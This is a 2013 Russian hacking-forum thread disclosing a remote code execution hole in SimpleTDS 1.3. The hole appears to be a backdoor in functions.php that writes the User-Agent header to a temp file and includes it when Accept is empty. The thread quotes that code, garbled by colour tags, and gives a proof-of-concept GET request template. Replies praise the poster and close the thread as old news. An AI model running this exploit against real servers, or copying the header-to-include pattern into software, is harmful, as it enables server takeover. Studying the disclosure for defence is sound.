HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.10.2013, 12:17
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707

Репутация: 935


По умолчанию

Официальный дистр: http://simpletds.com/download-1_3

Уязвимый код в functions.php (205-215):

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]{

[/
COLOR][COLOR="#0000BB"]$accept[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_ACCEPT'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

if([/COLOR][COLOR="#0000BB"]$debug[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$accept[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#0000BB"]$os_repository[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]tempnam[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]sys_get_temp_dir[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#DD0000"]'OSV'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$os_repository[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_USER_AGENT'[/COLOR][COLOR="#007700"]]);

[/
COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]);

include_once([/COLOR][COLOR="#0000BB"]$os_repository[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$os_repository[/COLOR][COLOR="#007700"]);

}

}

[/
COLOR][/COLOR
POC:

Код:
GET /functions.php HTTP/1.1
Host: localhost
User-Agent: 
Accept: 
Connection: keep-alive
 
Ответить с цитированием

  #2  
Старый 10.10.2013, 12:25
Ironmаn
Новичок
Регистрация: 22.08.2013
Сообщений: 8
Провел на форуме:
2567

Репутация: 0
По умолчанию

молодец! я всегда знал что ти хакир
 
Ответить с цитированием

  #3  
Старый 10.10.2013, 13:48
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Было найдено пару лет назад BECHED aka ROOT-access.

Закрываю.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.